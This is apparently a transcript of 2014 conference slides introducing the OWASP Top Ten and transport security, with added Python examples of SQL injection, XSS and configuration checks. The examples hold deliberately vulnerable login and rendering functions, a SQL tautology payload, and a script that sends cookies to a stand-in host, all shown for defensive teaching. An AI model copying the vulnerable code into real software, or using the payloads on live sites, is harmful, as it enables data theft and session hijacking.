So Your Company Hired a Pentest Team
Carl Sue, Security Analyst, FishNet Security, Application Security

Posted 05-Dec-2014 (uploaded by northbayweb)

TRANSCRIPT

Page 1: So Your Company Hired A Pentester

So Your Company Hired a Pentest Team

Carl Sue, Security Analyst, FishNet Security, Application Security

Page 2

Disclaimer

The contents of this talk are my own personal research and training. FishNet Security has no affiliation with this talk and cannot be held responsible for any of its contents. As such it should not be seen as marketing or any other form of public interaction by FishNet Security.

Page 3

Don’t Panic!

No Really!

Don’t Panic!

Page 4

Truly Secure Site

Page 5

Web 2.0 is about Risk Assessment: these sites are still considered secure

Facebook, WordPress

Page 6

Why Risk Assessment?

• The Internet is BIG.

• No, no, no: the Internet is REALLY, REALLY BIG.

• To go along with this really big Internet we have a really big codebase.

• To add to this really big codebase, just like we learned in our first programming class, there are a thousand ways to do just about anything.

• Risk assessment is more about hardening your web app or site against common attacks than against uncommon attacks that target your unique situation.

• Now you must be thinking: what's low-hanging fruit?

Page 7

Low Hanging Fruit

• OWASP Top Ten

• OWASP is the Open Web Application Security Project.

• Every few years they put out a report of the ten most critical web application security risks found on the internet.

• They also have some great tools for testing your web applications.

• If you want an idea of how to prepare for a security audit, OWASP is a great resource.

Page 8

OWASP Top Ten 2010

A1: Injection

A2: Cross-Site Scripting (XSS)

A3: Broken Authentication and Session Management

A4: Insecure Direct Object References

A5: Cross-Site Request Forgery (CSRF)

A6: Security Misconfiguration

A7: Failure to Restrict URL Access

A8: Insecure Cryptographic Storage

A9: Insufficient Transport Layer Protection

A10: Unvalidated Redirects and Forwards

Page 9

A1 - Injection

Injection means…

• Tricking an application into including unintended commands in the data sent to an interpreter

SQL injection is still quite common

• Many applications still susceptible (really don't know why)

• Even though it's usually very simple to avoid

Typical Impact

• Usually severe. Entire database can usually be read or modified

• May also allow full database schema, or account access, or even OS level access

Page 10

Injection Defense Recommendations

1. Avoid the interpreter entirely, or

2. Use an interface that supports bind variables (e.g., prepared statements, or stored procedures). Bind variables allow the interpreter to distinguish between code and data. Note that a stored procedure which concatenates its arguments into dynamic SQL internally is just as injectable as inline string-building.

3. Encode all user input before passing it to the interpreter

• Always perform 'white list' input validation on all user supplied input

• Always minimize database privileges to reduce the impact of a flaw
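The recommendations above, worked as an added example that is not part of the talk: a login query built by string concatenation beside the same query with bind variables, with a white-list check in front of it. It uses Python's sqlite3 against an in-memory table; the table layout, the query shape, the account data and the payload are constructed for illustration.

```python
"""Injection: a string-built SQL query beside the bound-variable form.

Added example, not from the talk. Uses Python's sqlite3 against an
in-memory users table; the table, the query shape and the payload
are constructed for illustration.
"""
import re
import sqlite3

# White-list for usernames: letters, digits, underscore, 1..32 chars. A quote never passes.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")

# Classic tautology payload: closes the string literal and makes the WHERE clause always true.
PAYLOAD = "' OR '1'='1"


def make_db() -> sqlite3.Connection:
    """Constructed users table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> list:
    """Concatenation: the interpreter cannot tell data from code, so the payload becomes SQL.
    With PAYLOAD as the password the query reads
      ... WHERE name = 'alice' AND password = '' OR '1'='1'
    and returns every row without checking any password."""
    sql = f"SELECT name, role FROM users WHERE name = '{name}' AND password = '{password}'"
    return conn.execute(sql).fetchall()


def login_safe(conn: sqlite3.Connection, name: str, password: str) -> list:
    """Bind variables: the same payload is compared as a literal string and matches nothing."""
    sql = "SELECT name, role FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchall()


def is_valid_username(name: str) -> bool:
    """White-list validation, applied in addition to (never instead of) bind variables."""
    return USERNAME_RE.fullmatch(name) is not None


def login(conn: sqlite3.Connection, name: str, password: str) -> list:
    """Defence in depth: reject out-of-policy usernames, then run the bound query."""
    if not is_valid_username(name):
        return []
    return login_safe(conn, name, password)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "alice", PAYLOAD))  # both rows, no password known
    print("bound:     ", login_safe(db, "alice", PAYLOAD))        # []
    print("validated: ", login(db, PAYLOAD, "x"))                  # [] before touching the DB
```

The last bullet of the slide is the part code cannot show: the account the application connects with should hold only the rights its queries need, so that an injection which does get through cannot read other tables, write, or reach the file system.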

Page 11

A2 – Cross Site Scripting (XSS)

Occurs any time…

• Raw data from attacker is sent to an innocent user's browser

Typical Impact

• Steal user's session, steal sensitive data, rewrite web page, redirect user to phishing or malware site

• Most Severe: Install XSS proxy which allows attacker to observe and direct all user's behavior on vulnerable site and force user to other sites

Page 12

Cross Site Scripting Mitigation

Recommendations

Eliminate the Flaw

• Don't include user supplied input in the output page

Defend Against the Flaw

• Primary Recommendation: Output encode all user supplied input, using the encoding for the context it lands in (HTML body, HTML attribute, JavaScript, CSS or URL); HTML-entity encoding alone does not protect the other contexts

• Perform 'white list' input validation on all user input to be included in page

• For large chunks of user supplied HTML, use HTML sanitization to sanitize all HTML and make it safe
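The "defend against the flaw" steps above, as an added example that is not part of the talk: a page fragment that reflects a display name raw, beside the same fragment with output encoding for the HTML body and for an attribute, plus a white-list check. Python's html.escape stands in for the encoder; the templates, the field name and the two attacker strings are constructed.

```python
"""XSS: raw reflection of user data beside context-aware output encoding.

Added example, not from the talk. The page fragments, field name and
attacker strings are constructed; html.escape is the standard library.
"""
import html
import re

# White-list for a display name: letters, digits, space, dot, underscore, hyphen; 1..40 chars.
DISPLAY_NAME_RE = re.compile(r"^[A-Za-z0-9 ._-]{1,40}$")

# Constructed attacker inputs for the two output contexts shown below.
BODY_PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'


def render_vulnerable(display_name: str) -> str:
    """Raw data from the attacker is sent to the victim's browser and executes as script."""
    return f"<p>Welcome back, {display_name}!</p>"


def render_body_encoded(display_name: str) -> str:
    """HTML body context: ampersand, angle brackets and both quote characters become
    entities, so the browser renders the input as text rather than markup."""
    return f"<p>Welcome back, {html.escape(display_name, quote=True)}!</p>"


def render_attribute_quoted_only(display_name: str) -> str:
    """Attribute context done wrong: quoted but not encoded. ATTR_PAYLOAD closes the
    value early and smuggles in an event handler attribute."""
    return f'<input name="who" value="{display_name}">'


def render_attribute_encoded(display_name: str) -> str:
    """Attribute context done right: quoted AND encoded. The quote in the payload becomes
    &quot; and can no longer terminate the attribute value."""
    return f'<input name="who" value="{html.escape(display_name, quote=True)}">'


def is_valid_display_name(display_name: str) -> bool:
    """White-list validation on input; output encoding is still required on every page."""
    return DISPLAY_NAME_RE.fullmatch(display_name) is not None


def contains_script_tag(fragment: str) -> bool:
    """Crude oracle for the demo: did a live <script> tag survive into the output?"""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    print(render_vulnerable(BODY_PAYLOAD))            # script tag reaches the browser
    print(render_body_encoded(BODY_PAYLOAD))          # &lt;script&gt;... shown as text
    print(render_attribute_quoted_only(ATTR_PAYLOAD)) # value="" onmouseover="alert(...)"
    print(render_attribute_encoded(ATTR_PAYLOAD))     # value="&quot; onmouseover=&quot;..."
    print(is_valid_display_name(BODY_PAYLOAD))        # False
```

html.escape makes everything text, which is what the slide's primary recommendation wants for ordinary fields. It is not a sanitizer: the slide's last bullet (large chunks of user HTML that must keep some tags) needs an allow-list HTML sanitizer, and values placed inside JavaScript or URLs need the encoder for that context.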

Page 13

A6 – Security Misconfiguration

Web applications rely on a secure foundation

• Everywhere from the OS up through the App Server

• Don't forget all the libraries you are using!!

Is your source code a secret?

• Think of all the places your source code goes

• Security should not require secret source code

CM must extend to all parts of the application

• All credentials should change in production

Typical Impact

• Install backdoor through missing OS or server patch

• XSS flaw exploits due to missing application framework patches

• Unauthorized access to default accounts, application functionality or data, or unused but accessible functionality due to poor server configuration

Page 14

Proper Security Configuration Management

Verify your system's configuration management

• Secure configuration "hardening" guideline

  • Automation is REALLY USEFUL here

• Must cover entire platform and application

• Keep up with patches for ALL components

  • This includes software libraries, not just OS and Server applications

• Analyze security effects of changes

Can you "dump" the application configuration?

• Build reporting into your process

• If you can't verify it, it isn't secure

Verify the implementation

• Scanning finds generic configuration and missing patch problems
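The verification points above (dump the configuration, check it against a hardening guideline, build reporting in), as an added example that is not part of the talk: a Python check over a constructed INI-style deployment config. The section and key names, the lists of default account names and placeholder secrets, and the rules themselves are assumptions standing in for a real hardening guide; the weak config is shown beside a corrected one.

```python
"""Security misconfiguration: dump a deployment config and check it against a hardening list.

Added example, not from the talk. The INI layout, key names, credential
lists and rules are assumptions standing in for a real hardening guide.
"""
import configparser

# Constructed sample: a development config promoted to production unchanged.
WEAK_CONFIG = """
[app]
debug = true
environment = production
admin_user = admin
admin_password = admin

[server]
directory_listing = on
tls_min_version = TLSv1.0

[database]
user = root
password = changeme
"""

# Constructed sample: the same application after the findings were fixed (secrets are made up).
HARDENED_CONFIG = """
[app]
debug = false
environment = production
admin_user = ops_admin
admin_password = Qx7!vR2pLm9#sWe4

[server]
directory_listing = off
tls_min_version = TLSv1.2

[database]
user = app_rw
password = Nn4$kP8qZt1&yBv6
"""

# Assumed lists of shipped/placeholder values that must never survive into production.
DEFAULT_ACCOUNT_NAMES = {"admin", "administrator", "root", "sa", "guest"}
DEFAULT_SECRETS = {"", "admin", "password", "changeme", "root", "default", "123456"}
OBSOLETE_TLS = {"SSLv2", "SSLv3", "TLSv1.0", "TLSv1.1"}


def load_config(text: str) -> configparser.ConfigParser:
    """Parse INI text with interpolation off so '%' or '$' inside secrets are left alone."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(text)
    return cfg


def dump_config(cfg: configparser.ConfigParser) -> list:
    """'Can you dump the application configuration?' Flat section.key=value lines for review."""
    return [f"{s}.{k}={v}" for s in cfg.sections() for k, v in cfg[s].items()]


def check_hardening(cfg: configparser.ConfigParser) -> list:
    """Return one finding per violated rule; an empty list means every check passed."""
    findings = []
    app, srv, db = cfg["app"], cfg["server"], cfg["database"]

    if app.getboolean("debug", fallback=False):
        findings.append("app.debug is on: stack traces and internals leak to clients")
    if app.get("admin_user", "").lower() in DEFAULT_ACCOUNT_NAMES:
        findings.append("app.admin_user is a default account name")
    for key, value in (("app.admin_password", app.get("admin_password", "")),
                       ("database.password", db.get("password", ""))):
        if value.lower() in DEFAULT_SECRETS:
            findings.append(f"{key} is a default or placeholder credential")
    if db.get("user", "").lower() in DEFAULT_ACCOUNT_NAMES:
        findings.append("database.user is a superuser/default account: minimize DB privileges")
    if srv.getboolean("directory_listing", fallback=False):
        findings.append("server.directory_listing is on: unused files become browsable")
    if srv.get("tls_min_version") in OBSOLETE_TLS:
        findings.append(f"server.tls_min_version {srv.get('tls_min_version')} is obsolete")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        cfg = load_config(text)
        print(f"== {label}: {len(dump_config(cfg))} settings dumped")
        for finding in check_hardening(cfg) or ["no findings"]:
            print("  -", finding)
```

The dump is the part to keep even when the rule set changes: a flat, diffable list of effective settings per environment is what lets the "all credentials should change in production" rule from the previous slide be verified rather than assumed.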

Page 15

Are Your Comms Secure?

• SSL

• VPN

• PKI

• SSH/SFTP

Page 16

PKI - If I Can’t read it nobody can

Page 17

SSL - Keeping it Clean

Does

• Third-party authentication (the server proves its identity with a certificate issued by a CA the client trusts)

• PKI-based encryption

• Keeps the conversation between the client and the host

Does Not

• Protect the client from malware snooping or interference

• Remove malicious code.

Why It's not standard

• Encryption is process heavy (far less so on current hardware than when this argument started)

• The internet is old

When you should use it.

• Always…

• When dynamic code is used

• At least when logins are in use anywhere on the site.

Page 18

VPN - Keeping it Local

Does

• PKI encryption

• Keeps the conversation between the client and the host

Does Not

• Protect the client from malware snooping or interference

• Remove malicious code.

Why It's not standard

• Encryption is process heavy

• The internet is old

When you should use it.

• Always…

• When dynamic code is used

• At least when logins are in use anywhere on the site.

Page 19

SSH/SFTP – Connect Properly

Does

• Public-key encryption (host keys and user keys; verify the host key fingerprint on first connect, since that is the only thing standing between you and a man in the middle)

• Connects to your server for quick secure file management

• Allows you to issue commands to your server

Does Not

• Help the Client

• Provide any code sanitization

What It Replaces

• FTP

• God forbid, Telnet

When You Should Use It.

• Any time you connect to your server

• All file transfer for source code

• Editing any source on host

Page 20

Contact Info

Email: [email protected]

@iamcobolt

Web: http://www.fishnetsecurity.com/Blogs

Personal: http://www.carlsue.com

Thanks For Having Me!

More Info

• https://www.owasp.org

• The Web Application Hacker's Handbook

• The Tangled Web – No Starch Press

• SQL Injection Attacks and Defense

Questions?